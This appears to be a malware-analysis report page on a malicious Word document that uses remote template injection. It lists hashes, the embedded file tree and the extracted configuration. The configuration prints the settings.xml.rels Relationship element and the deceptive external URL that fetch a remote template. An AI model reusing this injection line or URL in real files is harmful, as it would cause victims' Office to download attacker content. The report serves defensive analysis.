Malicious
Malicious

1519613717060114b84b85def0e37774

MS Word Document
|
MD5: 1519613717060114b84b85def0e37774
|
Size: 113.16 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Corrupted

Print
General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
1519613717060114b84b85def0e37774
Sha1
366e202639b936ec6e1b3322fa6739217c44fcdd
Sha256
bf9a021187e7b7be90c3031504c48a471094e3d7560afbb2e91dcb3d102b7788
Sha384
7f21d47ce5c63c1fb61716e310de73fc2b68cd254be12bc9387786c3b2f1d778787ef68346e90f36f4105a49698479ee
Sha512
b8e968935764b4cf1422014e8e3aa42a65f63d216cc8200bdab9ace09dce78cefed6c43cf789fef43a5d063d6ed52f7ab6bf5e6e38b94487c726ce40fff16aeb
SSDeep
3072:TnczZP99mU9Q26qplFW/mPr9SrdwYwEWZ2gdYjyh:TnS9QU9fpPW/madwYwrWyh
TLSH
A3B302A0D01C74EDD504B5BDBED4E3A22FFE7182971706AE8985421A4AFF90FD718A1C
File Structure
1519613717060114b84b85def0e37774
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Corrupted
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
Malicious
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
sharedStrings.xml
Xml
worksheets
_rels
sheet1.xml.rels
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
styles.xml
Xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
Xml
_rels
item3.xml.rels
Xml
item2.xml.rels
Xml
item1.xml.rels
Xml
item1.xml
Xml
itemProps1.xml
Xml
itemProps3.xml
Xml
item3.xml
Xml
item2.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
Microsoft_Office_Excel_97-2003_Worksheet1.xls
Office Document
Corrupted
Malicious
Root Entry
Malicious
Ole
EPRINT
CompObj
ObjInfo
Workbook
Office Document
Corrupted
Malicious
[Repaired @0x0000568B]
Office Document
Corrupted
Malicious
SummaryInformation
DocumentSummaryInformation
[Repaired @0x0005B08B]
Office Document
Corrupted
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
drs
shapexml.xml
Xml
downrev.xml
Xml
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb

1519613717060114b84b85def0e37774 (113.16 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙